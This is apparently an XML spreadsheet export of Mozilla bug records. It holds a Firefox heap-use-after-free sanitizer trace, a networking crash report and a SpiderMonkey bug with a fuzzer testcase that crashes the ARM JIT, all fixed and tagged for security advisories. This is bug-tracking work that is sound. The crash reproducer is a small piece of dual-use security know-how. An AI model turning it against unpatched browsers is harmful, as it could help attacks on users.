&gt;    #20 0x7fee96b7089f in (anonymous namespace)::MessageEventRunnable::WorkerRun(JSContext*, mozilla::dom::workers::WorkerPrivate*) dom/workers/WorkerPrivate.cpp:1058
&gt;    #21 0x7fee96b7393a in mozilla::dom::workers::WorkerRunnable::Run() dom/workers/WorkerRunnable.cpp:312
&gt;    #22 0x7fee937b9020 in nsThread::ProcessNextEvent(bool, bool*) xpcom/threads/nsThread.cpp:699
&gt;    #23 0x7fee9367dfda in NS_ProcessNextEvent(nsIThread*, bool) xpcom/glue/nsThreadUtils.cpp:263
&gt;    #24 0x7fee96b4b4bf in mozilla::dom::workers::WorkerPrivate::DoRunLoop(JSContext*) dom/workers/WorkerPrivate.cpp:4056
&gt;    #25 0x7fee96b2b644 in (anonymous namespace)::WorkerThreadPrimaryRunnable::Run() dom/workers/RuntimeService.cpp:2559
&gt;    #26 0x7fee937b9020 in nsThread::ProcessNextEvent(bool, bool*) xpcom/threads/nsThread.cpp:699
&gt;    #27 0x7fee9367dfda in NS_ProcessNextEvent(nsIThread*, bool) xpcom/glue/nsThreadUtils.cpp:263
&gt;    #28 0x7fee93f8e836 in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) ipc/glue/MessagePump.cpp:336
&gt;    #29 0x7fee93f363b0 in MessageLoop::Run() ipc/chromium/src/base/message_loop.cc:226
&gt;
&gt;Thread T78 (DOM Worker) created by T77 (DOM Worker) here:
&gt;    #0 0x4602f5 in __interceptor_pthread_create _asan_rtl_
&gt;    #1 0x7fee9fa1671d in _PR_CreateThread nsprpub/pr/src/pthreads/ptthread.c:453
&gt;    #2 0x7fee9fa1629a in PR_CreateThread nsprpub/pr/src/pthreads/ptthread.c:544
&gt;    #3 0x7fee937b719b in nsThread::Init() xpcom/threads/nsThread.cpp:384
&gt;    #4 0x7fee96b201be in mozilla::dom::workers::RuntimeService::WorkerThread::Create() dom/workers/RuntimeService.cpp:2362
&gt;    #5 0x7fee96b1f5f4 in mozilla::dom::workers::RuntimeService::ScheduleWorker(JSContext*, mozilla::dom::workers::WorkerPrivate*) dom/workers/RuntimeService.cpp:1511
&gt;    #6 0x7fee96b1d14b in mozilla::dom::workers::RuntimeService::RegisterWorker(JSContext*, mozilla::dom::workers::WorkerPrivate*) dom/workers/RuntimeService.cpp:1378
&gt;    #7 0x7fee96b47454 in mozilla::dom::workers::WorkerPrivate::Constructor(mozilla::dom::GlobalObject const&amp;, nsAString_internal const&amp;, bool, mozilla::dom::workers::WorkerPrivateParent&lt;mozilla::dom::workers::WorkerPrivate&gt;::WorkerType, nsACString_internal const&amp;, mozilla::dom::workers::WorkerPrivateParent&lt;mozilla::dom::workers::WorkerPrivate&gt;::LoadInfo*, mozilla::ErrorResult&amp;) dom/workers/WorkerPrivate.cpp:3694
&gt;    #8 0x7fee96b470a2 in mozilla::dom::workers::WorkerPrivate::Constructor(mozilla::dom::GlobalObject const&amp;, nsAString_internal const&amp;, mozilla::ErrorResult&amp;) dom/workers/WorkerPrivate.cpp:3588
&gt;    #9 0x7fee95ecb0d0 in mozilla::dom::WorkerBinding::_constructor(JSContext*, unsigned int, JS::Value*) objdir-ff-asan/dom/bindings/./WorkerBinding.cpp:669
&gt;    #10 0x7fee9ac761ed in js::InvokeConstructor(JSContext*, JS::CallArgs) js/src/jscntxtinlines.h:239
&gt;    #11 0x7fee9ac67ffe in Interpret(JSContext*, js::RunState&amp;) js/src/vm/Interpreter.cpp:2618
&gt;    #12 0x7fee9ac4b539 in js::RunScript(JSContext*, js::RunState&amp;) js/src/vm/Interpreter.cpp:421
&gt;    #13 0x7fee9ac74bc5 in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) js/src/vm/Interpreter.cpp:493
&gt;    #14 0x7fee9ac75c6e in js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value const*, JS::MutableHandle&lt;JS::Value&gt;) js/src/vm/Interpreter.cpp:530
&gt;    #15 0x7fee9a8c3f2f in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) js/src/jsapi.cpp:5056
&gt;    #16 0x7fee9541f001 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, mozilla::ErrorResult&amp;) objdir-ff-asan/dom/bindings/./EventHandlerBinding.cpp:35
&gt;    #17 0x7fee9686c88f in JS::Value mozilla::dom::EventHandlerNonNull::Call&lt;nsISupports*&gt;(nsISupports* const&amp;, mozilla::dom::Event&amp;, mozilla::ErrorResult&amp;, mozilla::dom::CallbackObject::ExceptionHandling) objdir-ff-asan/dom/events/../../dist/include/mozilla/dom/EventHandlerBinding.h:62
&gt;    #18 0x7fee9686adaf in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) dom/events/JSEventHandler.cpp:205
&gt;    #19 0x7fee9683ada0 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) dom/events/EventListenerManager.cpp:950
&gt;    #20 0x7fee9683c1e0 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) dom/events/EventListenerManager.cpp:1011
&gt;    #21 0x7fee9682cbf1 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) dom/events/EventDispatcher.cpp:287
&gt;    #22 0x7fee96830d16 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsCOMArray&lt;mozilla::dom::EventTarget&gt;*) dom/events/EventDispatcher.cpp:597
&gt;    #23 0x7fee967f6fc5 in mozilla::EventDispatcher::DispatchDOMEvent(nsISupports*, mozilla::WidgetEvent*, nsIDOMEvent*, nsPresContext*, nsEventStatus*) dom/events/EventDispatcher.cpp:661
&gt;    #24 0x7fee96b70fe5 in (anonymous namespace)::MessageEventRunnable::DispatchDOMEvent(JSContext*, mozilla::dom::workers::WorkerPrivate*, mozilla::DOMEventTargetHelper*, bool) dom/workers/WorkerPrivate.cpp:1010
&gt;    #25 0x7fee96b7089f in (anonymous namespace)::MessageEventRunnable::WorkerRun(JSContext*, mozilla::dom::workers::WorkerPrivate*) dom/workers/WorkerPrivate.cpp:1058
&gt;    #26 0x7fee96b7393a in mozilla::dom::workers::WorkerRunnable::Run() dom/workers/WorkerRunnable.cpp:312
&gt;    #27 0x7fee937b9020 in nsThread::ProcessNextEvent(bool, bool*) xpcom/threads/nsThread.cpp:699
&gt;    #28 0x7fee9367dfda in NS_ProcessNextEvent(nsIThread*, bool) xpcom/glue/nsThreadUtils.cpp:263
&gt;    #29 0x7fee96b4b4bf in mozilla::dom::workers::WorkerPrivate::DoRunLoop(JSContext*) dom/workers/WorkerPrivate.cpp:4056
&gt;    #30 0x7fee96b2b644 in (anonymous namespace)::WorkerThreadPrimaryRunnable::Run() dom/workers/RuntimeService.cpp:2559
&gt;    #31 0x7fee937b9020 in nsThread::ProcessNextEvent(bool, bool*) xpcom/threads/nsThread.cpp:699
&gt;    #32 0x7fee9367dfda in NS_ProcessNextEvent(nsIThread*, bool) xpcom/glue/nsThreadUtils.cpp:263
&gt;    #33 0x7fee93f8e857 in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) ipc/glue/MessagePump.cpp:307
&gt;    #34 0x7fee93f363b0 in MessageLoop::Run() ipc/chromium/src/base/message_loop.cc:226
&gt;    #35 0x7fee937b5e05 in nsThread::ThreadFunc(void*) xpcom/threads/nsThread.cpp:311
&gt;    #36 0x7fee9fa19d95 in _pt_root nsprpub/pr/src/pthreads/ptthread.c:212
&gt;    #37 0x7feea2f36e99 in start_thread /build/buildd/eglibc-2.15/nptl/pthread_create.c:308
&gt;
&gt;Thread T77 (DOM Worker) created by T0 here:
&gt;    #0 0x4602f5 in __interceptor_pthread_create _asan_rtl_
&gt;    #1 0x7fee9fa1671d in _PR_CreateThread nsprpub/pr/src/pthreads/ptthread.c:453
&gt;    #2 0x7fee9fa1629a in PR_CreateThread nsprpub/pr/src/pthreads/ptthread.c:544
&gt;    #3 0x7fee937b719b in nsThread::Init() xpcom/threads/nsThread.cpp:384
&gt;    #4 0x7fee96b201be in mozilla::dom::workers::RuntimeService::WorkerThread::Create() dom/workers/RuntimeService.cpp:2362
&gt;    #5 0x7fee96b1f5f4 in mozilla::dom::workers::RuntimeService::ScheduleWorker(JSContext*, mozilla::dom::workers::WorkerPrivate*) dom/workers/RuntimeService.cpp:1511
&gt;    #6 0x7fee96b1d14b in mozilla::dom::workers::RuntimeService::RegisterWorker(JSContext*, mozilla::dom::workers::WorkerPrivate*) dom/workers/RuntimeService.cpp:1378
&gt;    #7 0x7fee96b47454 in mozilla::dom::workers::WorkerPrivate::Constructor(mozilla::dom::GlobalObject const&amp;, nsAString_internal const&amp;, bool, mozilla::dom::workers::WorkerPrivateParent&lt;mozilla::dom::workers::WorkerPrivate&gt;::WorkerType, nsACString_internal const&amp;, mozilla::dom::workers::WorkerPrivateParent&lt;mozilla::dom::workers::WorkerPrivate&gt;::LoadInfo*, mozilla::ErrorResult&amp;) dom/workers/WorkerPrivate.cpp:3694
&gt;    #8 0x7fee96b470a2 in mozilla::dom::workers::WorkerPrivate::Constructor(mozilla::dom::GlobalObject const&amp;, nsAString_internal const&amp;, mozilla::ErrorResult&amp;) dom/workers/WorkerPrivate.cpp:3588
&gt;    #9 0x7fee95ecb0d0 in mozilla::dom::WorkerBinding::_constructor(JSContext*, unsigned int, JS::Value*) objdir-ff-asan/dom/bindings/./WorkerBinding.cpp:669
&gt;    #10 0x7fee9ac761ed in js::InvokeConstructor(JSContext*, JS::CallArgs) js/src/jscntxtinlines.h:239
&gt;    #11 0x7fee9ac67ffe in Interpret(JSContext*, js::RunState&amp;) js/src/vm/Interpreter.cpp:2618
&gt;    #12 0x7fee9ac4b539 in js::RunScript(JSContext*, js::RunState&amp;) js/src/vm/Interpreter.cpp:421
&gt;    #13 0x7fee9ac74bc5 in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) js/src/vm/Interpreter.cpp:493
&gt;    #14 0x7fee9ac75c6e in js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value const*, JS::MutableHandle&lt;JS::Value&gt;) js/src/vm/Interpreter.cpp:530
&gt;    #15 0x7fee9aa59b24 in js::DirectProxyHandler::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) js/src/jsproxy.cpp:465
&gt;    #16 0x7fee9ab7ee36 in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) js/src/jswrapper.cpp:465
&gt;    #17 0x7fee9aa7d3a5 in js::Proxy::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) js/src/jsproxy.cpp:2686
&gt;    #18 0x7fee9aa828f4 in js::proxy_Call(JSContext*, unsigned int, JS::Value*) js/src/jsproxy.cpp:3089
&gt;    #19 0x7fee9ac74677 in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) js/src/jscntxtinlines.h:239
&gt;    #20 0x7fee9ac6800f in Interpret(JSContext*, js::RunState&amp;) js/src/vm/Interpreter.cpp:2621
&gt;    #21 0x7fee9ac4b539 in js::RunScript(JSContext*, js::RunState&amp;) js/src/vm/Interpreter.cpp:421
&gt;    #22 0x7fee9ac74bc5 in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) js/src/vm/Interpreter.cpp:493
&gt;    #23 0x7fee9ac75c6e in js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value const*, JS::MutableHandle&lt;JS::Value&gt;) js/src/vm/Interpreter.cpp:530
&gt;    #24 0x7fee9a8c3f2f in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) js/src/jsapi.cpp:5056
&gt;    #25 0x7fee9541f001 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, mozilla::ErrorResult&amp;) objdir-ff-asan/dom/bindings/./EventHandlerBinding.cpp:35
&gt;    #26 0x7fee9686c88f in JS::Value mozilla::dom::EventHandlerNonNull::Call&lt;nsISupports*&gt;(nsISupports* const&amp;, mozilla::dom::Event&amp;, mozilla::ErrorResult&amp;, mozilla::dom::CallbackObject::ExceptionHandling) objdir-ff-asan/dom/events/../../dist/include/mozilla/dom/EventHandlerBinding.h:62
&gt;    #27 0x7fee9686adaf in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) dom/events/JSEventHandler.cpp:205
&gt;    #28 0x7fee9683ada0 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) dom/events/EventListenerManager.cpp:950
&gt;    #29 0x7fee9683c1e0 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) dom/events/EventListenerManager.cpp:1011
&gt;    #30 0x7fee9682cbf1 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) dom/events/EventDispatcher.cpp:287
&gt;    #31 0x7fee96830d16 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsCOMArray&lt;mozilla::dom::EventTarget&gt;*) dom/events/EventDispatcher.cpp:597
&gt;    #32 0x7fee9658bb49 in nsGlobalWindow::PostHandleEvent(mozilla::EventChainPostVisitor&amp;) dom/base/nsGlobalWindow.cpp:3212
&gt;    #33 0x7fee9682cd3e in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) dom/events/EventDispatcher.cpp:243
&gt;    #34 0x7fee9682d3f7 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) dom/events/EventDispatcher.cpp:336
&gt;    #35 0x7fee96830d16 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsCOMArray&lt;mozilla::dom::EventTarget&gt;*) dom/events/EventDispatcher.cpp:597
&gt;    #36 0x7fee97d775a4 in nsDocumentViewer::LoadComplete(tag_nsresult) layout/base/nsDocumentViewer.cpp:1003
&gt;    #37 0x7fee989ecc08 in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, tag_nsresult) docshell/base/nsDocShell.cpp:6972
&gt;    #38 0x7fee989e9b99 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, tag_nsresult) docshell/base/nsDocShell.cpp:6763
&gt;    #39 0x7fee989e9fff in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, tag_nsresult) docshell/base/nsDocShell.cpp:6770
&gt;    #40 0x7fee9499882d in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&amp;, tag_nsresult) uriloader/base/nsDocLoader.cpp:1329
&gt;    #41 0x7fee94997b83 in nsDocLoader::doStopDocumentLoad(nsIRequest*, tag_nsresult) uriloader/base/nsDocLoader.cpp:863
&gt;    #42 0x7fee94995790 in nsDocLoader::DocLoaderIsEmpty(bool) uriloader/base/nsDocLoader.cpp:753
&gt;    #43 0x7fee94996d72 in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, tag_nsresult) uriloader/base/nsDocLoader.cpp:637
&gt;    #44 0x7fee9499753c in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, tag_nsresult) objdir-ff-asan/uriloader/base/Unified_cpp_uriloader_base0.cpp:641
&gt;    #45 0x7fee93926997 in nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, tag_nsresult) netwerk/base/src/nsLoadGroup.cpp:689
&gt;    #46 0x7fee96e0299c in nsDocument::DoUnblockOnload() content/base/src/nsDocument.cpp:8701
&gt;    #47 0x7fee96e0264a in nsDocument::UnblockOnload(bool) content/base/src/nsDocument.cpp:8629
&gt;    #48 0x7fee96dd7508 in nsDocument::DispatchContentLoadedEvents() content/base/src/nsDocument.cpp:4910
&gt;    #49 0x7fee96e28140 in nsRunnableMethodImpl&lt;void (nsDocument::*)(), void, true&gt;::Run() objdir-ff-asan/content/base/src/../../../dist/include/nsThreadUtils.h:387
&gt;    #50 0x7fee937b9020 in nsThread::ProcessNextEvent(bool, bool*) xpcom/threads/nsThread.cpp:699
&gt;    #51 0x7fee9367dfda in NS_ProcessNextEvent(nsIThread*, bool) xpcom/glue/nsThreadUtils.cpp:263
&gt;    #52 0x7fee93f8d909 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) ipc/glue/MessagePump.cpp:95
&gt;    #53 0x7fee93f363b0 in MessageLoop::Run() ipc/chromium/src/base/message_loop.cc:226
&gt;    #54 0x7fee961dca07 in nsBaseAppShell::Run() widget/xpwidgets/nsBaseAppShell.cpp:164
&gt;    #55 0x7fee99044638 in nsAppStartup::Run() toolkit/components/startup/nsAppStartup.cpp:277
&gt;    #56 0x7fee98eb63b3 in XREMain::XRE_mainRun() toolkit/xre/nsAppRunner.cpp:4019
&gt;    #57 0x7fee98eb729d in XREMain::XRE_main(int, char**, nsXREAppData const*) toolkit/xre/nsAppRunner.cpp:4088
&gt;    #58 0x7fee98eb80ed in XRE_main toolkit/xre/nsAppRunner.cpp:4300
&gt;    #59 0x48c6e7 in main browser/app/nsBrowserApp.cpp:282
&gt;    #60 0x7feea1f7276c in __libc_start_main /build/buildd/eglibc-2.15/csu/libc-start.c:226
&gt;
&gt;SUMMARY: AddressSanitizer: heap-use-after-free ??:0 ??
&gt;Shadow bytes around the buggy address:
&gt;  0x0c328011da30: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
&gt;  0x0c328011da40: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
&gt;  0x0c328011da50: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
&gt;  0x0c328011da60: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
&gt;  0x0c328011da70: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
&gt;=&gt;0x0c328011da80: fd fd fd fd fd fd fd fd fd[fd]fd fd fd fd fd fd
&gt;  0x0c328011da90: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
&gt;  0x0c328011daa0: fd fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa
&gt;  0x0c328011dab0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
&gt;  0x0c328011dac0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
&gt;  0x0c328011dad0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
&gt;Shadow byte legend (one shadow byte represents 8 application bytes):
&gt;  Addressable:           00
&gt;  Partially addressable: 01 02 03 04 05 06 07
&gt;  Heap left redzone:       fa
&gt;  Heap right redzone:      fb
&gt;  Freed heap region:       fd
&gt;  Stack left redzone:      f1
&gt;  Stack mid redzone:       f2
&gt;  Stack right redzone:     f3
&gt;  Stack partial redzone:   f4
&gt;  Stack after return:      f5
&gt;  Stack use after scope:   f8
&gt;  Global redzone:          f9
&gt;  Global init order:       f6
&gt;  Poisoned by user:        f7
&gt;  Contiguous container OOB:fc
&gt;  ASan internal:           fe
&gt;==15935==ABORTING
&gt;
&gt;</t>
        </is>
      </c>
      <c r="X2242" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2243">
      <c r="A2243" t="n">
        <v>1193389</v>
      </c>
      <c r="B2243" t="inlineStr">
        <is>
          <t>2015-08-11 09:09:47 -0700</t>
        </is>
      </c>
      <c r="C2243" t="inlineStr">
        <is>
          <t>crash in mozilla::net::nsHttpTransaction::OnTransportStatus(nsITransport*, nsresult, __int64) PR_Write</t>
        </is>
      </c>
      <c r="D2243" t="inlineStr">
        <is>
          <t>2024-09-18 19:36:50 -0700</t>
        </is>
      </c>
      <c r="E2243" t="n">
        <v>1</v>
      </c>
      <c r="F2243" t="n">
        <v>1</v>
      </c>
      <c r="G2243" t="n">
        <v>3</v>
      </c>
      <c r="H2243" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2243" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2243" t="inlineStr">
        <is>
          <t>Networking: HTTP</t>
        </is>
      </c>
      <c r="K2243" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2243" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2243" t="inlineStr">
        <is>
          <t>Windows NT</t>
        </is>
      </c>
      <c r="N2243" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2243" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2243" t="inlineStr">
        <is>
          <t>[monitoring until 2024-04-22][necko-triaged] [necko-monitor][adv-esr115.12+]</t>
        </is>
      </c>
      <c r="Q2243" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2243" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S2243" t="inlineStr">
        <is>
          <t>125 Branch</t>
        </is>
      </c>
      <c r="T2243" t="n">
        <v>1</v>
      </c>
      <c r="U2243" t="n">
        <v>0</v>
      </c>
      <c r="V2243" t="n">
        <v>27</v>
      </c>
      <c r="W2243" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-650c34bd-66fb-461f-b1a4-ad5eb2150810.
=============================================================
May be related to bug 1153929. 
Small number of crashes. 
Stack traces indicate connection with Http2.</t>
        </is>
      </c>
      <c r="X2243" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2244">
      <c r="A2244" t="n">
        <v>1269729</v>
      </c>
      <c r="B2244" t="inlineStr">
        <is>
          <t>2016-05-03 05:39:22 -0700</t>
        </is>
      </c>
      <c r="C2244" t="inlineStr">
        <is>
          <t>Assertion failure: aIndex &lt; mLength, at dist/include/mozilla/Vector.h:439 with OOM</t>
        </is>
      </c>
      <c r="D2244" t="inlineStr">
        <is>
          <t>2016-09-22 17:22:43 -0700</t>
        </is>
      </c>
      <c r="E2244" t="n">
        <v>1</v>
      </c>
      <c r="F2244" t="n">
        <v>1</v>
      </c>
      <c r="G2244" t="n">
        <v>3</v>
      </c>
      <c r="H2244" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2244" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2244" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2244" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2244" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M2244" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2244" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2244" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2244" t="inlineStr">
        <is>
          <t>[jsbugmon:update][adv-main47+][adv-esr45.2+]</t>
        </is>
      </c>
      <c r="Q2244" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2244" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2244" t="inlineStr">
        <is>
          <t>mozilla49</t>
        </is>
      </c>
      <c r="T2244" t="n">
        <v>1</v>
      </c>
      <c r="U2244" t="n">
        <v>0</v>
      </c>
      <c r="V2244" t="n">
        <v>16</v>
      </c>
      <c r="W2244" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision 77cead2cd203 (build with --enable-optimize --enable-posix-nspr-emulation --enable-valgrind --enable-gczeal --target=i686-pc-linux-gnu --disable-tests --enable-simulator=arm --enable-debug, run with --fuzzing-safe --thread-count=2 --ion-eager --ion-offthread-compile=off):
loadFile("");
loadFile("");
loadFile(`
  (function() {
    'use asm'
    function _main() {
      switch (0) {
       case 1:
       case 20:
      }
    }
  })
`);
function loadFile(lfVarx) {
    try {
      oomTest(function() {
          evaluate(lfVarx);
      })
    } catch (lfVare) {}
} 
Backtrace:
Program received signal SIGSEGV, Segmentation fault.
0x084b74ca in operator[] (aIndex=19, this=0xf54ec4f8) at js/src/debugarmsim/dist/include/mozilla/Vector.h:439
#0  0x084b74ca in operator[] (aIndex=19, this=0xf54ec4f8) at js/src/debugarmsim/dist/include/mozilla/Vector.h:439
#1  codeLabel (i=19, this=0xf54ec4e0) at js/src/jit/arm/CodeGenerator-arm.cpp:1063
#2  js::jit::CodeGeneratorARM::visitOutOfLineTableSwitch (this=0xffff6c30, ool=0xf54ec4e0) at js/src/jit/arm/CodeGenerator-arm.cpp:1080
#3  0x084c4a78 in js::jit::OutOfLineCodeBase&lt;js::jit::CodeGeneratorARM&gt;::generate (this=0xf54ec4e0, codegen=0xffff6c30) at js/src/jit/shared/CodeGenerator-shared.h:582
#4  0x08512e28 in js::jit::CodeGeneratorShared::generateOutOfLineCode (this=this@entry=0xffff6c30) at js/src/jit/shared/CodeGenerator-shared.cpp:182
#5  0x084bf31e in js::jit::CodeGeneratorARM::generateOutOfLineCode (this=this@entry=0xffff6c30) at js/src/jit/arm/CodeGenerator-arm.cpp:117
#6  0x082cbe86 in js::jit::CodeGenerator::generateAsmJS (this=this@entry=0xffff6c30, offsets=0xf7a4d7c8) at js/src/jit/CodeGenerator.cpp:8784
#7  0x08241ae3 in js::wasm::IonCompileFunction (task=0xf7a4d000) at js/src/asmjs/WasmIonCompile.cpp:3242
#8  0x081cd38f in js::wasm::ModuleGenerator::finishFuncDef (this=0xffff7ffc, funcIndex=0, generateTime=0, fg=fg@entry=0xffff7908) at js/src/asmjs/WasmGenerator.cpp:816
#9  0x081dcab3 in finish (generateTime=&lt;optimized out&gt;, funcIndex=&lt;optimized out&gt;, this=0xffff7900) at js/src/asmjs/AsmJS.cpp:2663
#10 CheckFunction (m=...) at js/src/asmjs/AsmJS.cpp:6696
#11 0x081def33 in CheckFunctions (m=...) at js/src/asmjs/AsmJS.cpp:6727
#12 CheckModule (cx=cx@entry=0xf7a74020, parser=..., stmtList=stmtList@entry=0xf7a813f0, moduleObj=moduleObj@entry=..., time=time@entry=0xffff8a40, slowFuncs=slowFuncs@entry=0xffff8aa0) at js/src/asmjs/AsmJS.cpp:6938
#13 0x081e39aa in js::CompileAsmJS (cx=0xf7a74020, parser=..., stmtList=stmtList@entry=0xf7a813f0, validated=validated@entry=0xffff8be0) at js/src/asmjs/AsmJS.cpp:8219
#14 0x08136bd5 in js::frontend::Parser&lt;js::frontend::FullParseHandler&gt;::asmJS (this=0xffffa3c0, list=0xf7a813f0) at js/src/frontend/Parser.cpp:3441
[...]
#41 0x0813f4ce in js::frontend::Parser&lt;js::frontend::FullParseHandler&gt;::globalBody (this=this@entry=0xffffa3c0) at js/src/frontend/Parser.cpp:1107
#42 0x0887f03b in BytecodeCompiler::compileScript (this=this@entry=0xffff9ef4, scopeChain=scopeChain@entry=..., evalCaller=evalCaller@entry=...) at js/src/frontend/BytecodeCompiler.cpp:531
#43 0x0887f75a in js::frontend::CompileScript (cx=cx@entry=0xf7a74020, alloc=0xf7a3c1a4, scopeChain=scopeChain@entry=..., enclosingStaticScope=enclosingStaticScope@entry=..., evalCaller=evalCaller@entry=..., options=..., srcBuf=..., source_=source_@entry=0x0, extraSct=extraSct@entry=0x0, sourceObjectOut=sourceObjectOut@entry=0x0) at js/src/frontend/BytecodeCompiler.cpp:742
#44 0x08541ce1 in Compile (cx=cx@entry=0xf7a74020, options=..., scopeOption=scopeOption@entry=HasSyntacticScope, srcBuf=..., script=script@entry=...) at js/src/jsapi.cpp:4006
#45 0x085422f6 in Compile (script=..., length=123, chars=0xf55fe300 u"\n  (function() {\n    'use asm'\n    function _main() {\n      switch (0) {\n       case 1:\n       case 20:\n      }\n    }\n  })\n", scopeOption=HasSyntacticScope, options=..., cx=0xf7a74020) at js/src/jsapi.cpp:4015
#46 JS::Compile (cx=0xf7a74020, options=..., chars=0xf55fe300 u"\n  (function() {\n    'use asm'\n    function _main() {\n      switch (0) {\n       case 1:\n       case 20:\n      }\n    }\n  })\n", length=123, script=script@entry=...) at js/src/jsapi.cpp:4074
#47 0x080f21b7 in Evaluate (cx=cx@entry=0xf7a74020, argc=argc@entry=1, vp=vp@entry=0xf59ffcb8) at js/src/shell/js.cpp:1481
[...]
